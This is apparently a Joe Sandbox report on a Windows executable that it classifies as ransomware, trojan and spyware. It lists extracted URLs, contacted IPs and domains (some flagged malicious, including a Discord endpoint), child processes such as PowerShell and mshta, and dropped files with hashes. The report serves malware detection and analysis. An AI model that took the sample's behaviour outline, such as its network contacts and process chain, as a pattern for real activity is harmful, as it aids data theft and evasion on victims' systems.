                                                                                                                                                                                                                                                                                                          https://www.wykop.pl/El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                            https://docs.python.org/3/howto/mro.html.El9HaBFrFM.exe, 00000001.00000003.1693682423.0000025067CCD000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249485409.0000025068040000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                              https://twitter.com/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711381621.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                https://www.olx.pl/El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                  https://support.mozilla.org/products/firefoxEl9HaBFrFM.exe, 00000001.00000003.1737193360.0000025068BE3000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249113560.0000025067CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    https://google.com/mail/El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                      8.2.111.136
                                                                                                                                                                                                                                                                                                                      sync2-dsp.e-volution.aiUnited States
                                                                                                                                                                                                                                                                                                                      46636NATCOWEBUSfalse
                                                                                                                                                                                                                                                                                                                      142.250.185.228
                                                                                                                                                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      35.190.0.66
                                                                                                                                                                                                                                                                                                                      ads.travelaudience.comUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      216.239.34.181
                                                                                                                                                                                                                                                                                                                      analytics-alv.google.comUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      151.101.193.229
                                                                                                                                                                                                                                                                                                                      jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                      35.204.158.49
                                                                                                                                                                                                                                                                                                                      um.simpli.fiUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      51.89.9.252
                                                                                                                                                                                                                                                                                                                      onetag-sys.comFrance
                                                                                                                                                                                                                                                                                                                      16276OVHFRfalse
                                                                                                                                                                                                                                                                                                                      34.160.236.64
                                                                                                                                                                                                                                                                                                                      tagr-pixel-nginx-odr-euw4.mookie1.comUnited States
                                                                                                                                                                                                                                                                                                                      2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                                                                                      142.250.185.142
                                                                                                                                                                                                                                                                                                                      www3.l.google.comUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      151.101.66.137
                                                                                                                                                                                                                                                                                                                      code.jquery.comUnited States
                                                                                                                                                                                                                                                                                                                      54113FASTLYUStrue
                                                                                                                                                                                                                                                                                                                      35.71.131.137
                                                                                                                                                                                                                                                                                                                      match.adsrvr.orgUnited States
                                                                                                                                                                                                                                                                                                                      237MERIT-AS-14USfalse
                                                                                                                                                                                                                                                                                                                      142.250.186.33
                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      174.137.133.49
                                                                                                                                                                                                                                                                                                                      dsp.adkernel.comUnited States
                                                                                                                                                                                                                                                                                                                      27257WEBAIR-INTERNETUSfalse
                                                                                                                                                                                                                                                                                                                      142.250.185.66
                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      52.16.92.15
                                                                                                                                                                                                                                                                                                                      ds-pr-bh.ybp.gysm.yahoodns.netUnited States
                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                      172.217.18.4
                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      160.153.155.187
                                                                                                                                                                                                                                                                                                                      trksyln.netUnited States
                                                                                                                                                                                                                                                                                                                      21501GODADDY-AMSDEtrue
                                                                                                                                                                                                                                                                                                                      107.21.226.44
                                                                                                                                                                                                                                                                                                                      sync.ipredictive.comUnited States
                                                                                                                                                                                                                                                                                                                      14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                      172.217.18.2
                                                                                                                                                                                                                                                                                                                      td.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      208.95.112.1
                                                                                                                                                                                                                                                                                                                      ip-api.comUnited States
                                                                                                                                                                                                                                                                                                                      53334TUT-ASUSfalse
                                                                                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                                                                                                                                                      172.217.16.193
                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      64.233.167.156
                                                                                                                                                                                                                                                                                                                      stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      142.250.186.174
                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      162.159.128.233
                                                                                                                                                                                                                                                                                                                      discord.comUnited States
                                                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                      216.58.206.34
                                                                                                                                                                                                                                                                                                                      ep1.adtrafficquality.googleUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      208.93.169.131
                                                                                                                                                                                                                                                                                                                      am1-direct-bgp.contextweb.comUnited States
                                                                                                                                                                                                                                                                                                                      26228SERVEPATHUSfalse
                                                                                                                                                                                                                                                                                                                      185.98.54.153
                                                                                                                                                                                                                                                                                                                      s.uuidksinc.netNetherlands
                                                                                                                                                                                                                                                                                                                      39572ADVANCEDHOSTERS-ASNLfalse
                                                                                                                                                                                                                                                                                                                      20.157.217.118
                                                                                                                                                                                                                                                                                                                      gw-c-eu-isp.temu.comUnited States
                                                                                                                                                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                      185.15.59.240
                                                                                                                                                                                                                                                                                                                      upload.wikimedia.orgNetherlands
                                                                                                                                                                                                                                                                                                                      14907WIKIMEDIAUSfalse
                                                                                                                                                                                                                                                                                                                      178.250.1.9
                                                                                                                                                                                                                                                                                                                      widget.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                      44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                      74.119.117.16
                                                                                                                                                                                                                                                                                                                      widget.us5.vip.prod.criteo.comUnited States
                                                                                                                                                                                                                                                                                                                      19750AS-CRITEOUSfalse
                                                                                                                                                                                                                                                                                                                      216.58.206.65
                                                                                                                                                                                                                                                                                                                      ep2.adtrafficquality.googleUnited States
                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                      54.170.20.205
                                                                                                                                                                                                                                                                                                                      match.prod.bidr.ioUnited States
                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                      35.214.168.80
                                                                                                                                                                                                                                                                                                                      gtrace.mediago.ioUnited States
                                                                                                                                                                                                                                                                                                                      19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                      54.88.211.52
                                                                                                                                                                                                                                                                                                                      sync.srv.stackadapt.comUnited States
                                                                                                                                                                                                                                                                                                                      14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                                                                                      192.168.2.4
                                                                                                                                                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                      Analysis ID:1546321
                                                                                                                                                                                                                                                                                                                      Start date and time:2024-10-31 19:18:08 +01:00
                                                                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                      Overall analysis duration:0h 13m 50s
                                                                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:103
                                                                                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                      Sample name:El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                                                                                                                                      Original Sample Name:cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6.exe
                                                                                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                                                                                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@184/327@106/38
                                                                                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                                                                                      • Successful, ratio: 42.9%
                                                                                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                                                                                      • Successful, ratio: 92%
                                                                                                                                                                                                                                                                                                                      • Number of executed functions: 102
                                                                                                                                                                                                                                                                                                                      • Number of non-executed functions: 192
                                                                                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.185.131, 142.250.186.142, 173.194.76.84, 34.104.35.123, 4.175.87.197, 142.250.186.136, 172.217.18.98, 172.64.147.188, 104.18.40.68, 93.184.221.240, 172.67.139.119, 104.21.26.223, 142.250.184.234, 172.217.18.3, 142.250.185.238, 104.18.40.209, 172.64.147.47, 192.229.221.95, 142.250.184.226, 142.250.184.200, 20.242.39.171, 142.250.185.174, 184.28.90.27, 216.58.206.67, 142.250.185.161, 142.250.186.130, 142.250.186.66, 13.107.42.14, 89.207.16.201, 172.105.220.23, 172.105.213.147, 172.104.64.149, 172.105.221.240, 139.162.84.221, 139.162.117.143, 172.105.199.172, 172.104.105.5, 172.105.235.90, 172.105.221.29, 172.105.203.31, 139.162.78.222, 172.104.70.67, 172.104.121.22, 172.105.232.22, 216.58.206.74, 142.250.181.227, 142.250.186.98, 172.217.16.194, 142.250.184.194, 142.250.185.130, 20.3.187.198, 142.250.185.162, 142.250.184.225, 142.250.185.227, 142.250.186.34, 142.250.185.99, 142.250.185.194
                                                                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.googleadservices.com, ka-f.fontawesome.com.cdn.cloudflare.net, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, l-0005.l-msedge.net, gocm-geo.c.appier.net.akadns.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, a.fsdn.com.cdn.cloudflare.net, www.gstatic.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com, kit.fontawesome.com.cdn.cloudflare.net, temu-gtm.trafficmanager.net, www-linkedin-com.l-0005.l-msedge.net, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsup
                                                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target bound.exe, PID 7944 because it is empty
                                                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 7912 because there are no executed function
                                                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7692 because it is empty
                                                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 8712 because it is empty
                                                                                                                                                                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                      • VT rate limit hit for: El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                                                                                      14:19:07API Interceptor161x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                      14:19:07API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                                                                                                      14:19:17API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.3277868142140765
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrM:KooCEYhgYEL0In
                                                                                                                                                                                                                                                                                                                      MD5:8DAED9FD50E02B2ED1062E72E0537846
                                                                                                                                                                                                                                                                                                                      SHA1:FF3A3F48411BE89DBB887F3DB9B933B1E02DE761
                                                                                                                                                                                                                                                                                                                      SHA-256:FAD9F978B05DF04B50EA1F31BE1D397B1332E719BDDB9420447431596124F0DE
                                                                                                                                                                                                                                                                                                                      SHA-512:2BCE2A77BDF8C19ED3858B63409515B943152C4B9065F69E6E2D0E3B70CAE83B0D52D1CDEB619D6F6684BC803B8A685287219E5A9BB1340E15DDB44725EFEA72
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9e2bf7d2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4221639830672254
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                                                                                      MD5:E67DFDE874D7C98C5557729BE735C16B
                                                                                                                                                                                                                                                                                                                      SHA1:D3438E98C7B2355A23FF254849C241F330ECDC4A
                                                                                                                                                                                                                                                                                                                      SHA-256:FBF66C75B5B928F096B288633DBDDFFE1A38CECD2918EBBDCAF83A9BB3B79CD8
                                                                                                                                                                                                                                                                                                                      SHA-512:19C82D87511AB24CEAED0A8DFFB987B1C893743CD19E6C618789A3B0EEEBCBFDB307E5A6DA874338863CE5EEE284D7A9B1FEAB6F2CCD03BEDCE5E07F4C1DF751
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.+..... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................c.......|w..................o.x.....|7..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.07708221772740234
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:fm/8YeB3ZSmvjn13a/NtFbtlollcVO/lnlZMxZNQl:OUzBpSi53qHFbIOewk
                                                                                                                                                                                                                                                                                                                      MD5:69165412A0BCFB79AF2836486CD0CCA0
                                                                                                                                                                                                                                                                                                                      SHA1:803E260E91226DD53C36DA6A55A3CF5BFEA14020
                                                                                                                                                                                                                                                                                                                      SHA-256:77B0B2F65E73E64A161BFA6BE55EE4B3A6706080746F31248F998DD5481276F3
                                                                                                                                                                                                                                                                                                                      SHA-512:BBE5A0D7C7E1F7BA4A7340C83389D6E50E3E6A33E8576D590F9E78E8B742AE57B6FD2D601244064EA4EBD0F42748A137A2AF2CC0CC8DDAFAFD5C26D20EAC49B9
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.,.z.....................................;...{.......|7......{A..............{A......{A..........{A].................o.x.....|7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):660
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.38575581059626
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1BakvoDLI4MWuPakEOsk7v:ML9E4KQ71qE4GIs0E4KD
                                                                                                                                                                                                                                                                                                                      MD5:E918A9A81162ACCFD3E06E02E11CB6C8
                                                                                                                                                                                                                                                                                                                      SHA1:10F02DAEDB20582256A5601EE8898CFA8DC2BDD5
                                                                                                                                                                                                                                                                                                                      SHA-256:912110B9095CDC4B124444955DD3ABAEFFB7C309A242A4B05299A26EC9920A21
                                                                                                                                                                                                                                                                                                                      SHA-512:78D9CABEFE698E54197D7D03ABC3AC36F3AAA2DE80CD79AD780B67324F36D7CA3560F642873E8C20F2BB27A9C892D9A2F21898E4B469FAFE35BA0FAEE8A7936A
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):19253
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.005753878328145
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                                                                                                                                                                                                                                      MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                                                                                                                                                                                                                                      SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                                                                                                                                                                                                                                      SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                                                                                                                                                                                                                                      SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):352686
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.8663228229696935
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:tyYzTopvZ+GxuDfCRy37eMsZur079djA0KxjiNnNyrK/YWtcp5JlS2rYUIoLn7W4:tyYzTopHoDfQyF7wX7YjiNnNy2/YWtcV
                                                                                                                                                                                                                                                                                                                      MD5:AC3AA6405754B7A695A050BF7F6F49B5
                                                                                                                                                                                                                                                                                                                      SHA1:CFF99E0D1F1A7E924C50773A17662D79B9E43252
                                                                                                                                                                                                                                                                                                                      SHA-256:665B19F3F263C696DEBF2739382D2313554946E0C51A96CB461964F3363C8C4D
                                                                                                                                                                                                                                                                                                                      SHA-512:339D9A8794809E6CD9F6FA421F1B72BB5BCFE307A6D999D9EE9BBC0B2AED7026F083390CEA225F42280CC043CB8A461FAE5F2A6E0DC2D32365D3D2B36A59915E
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
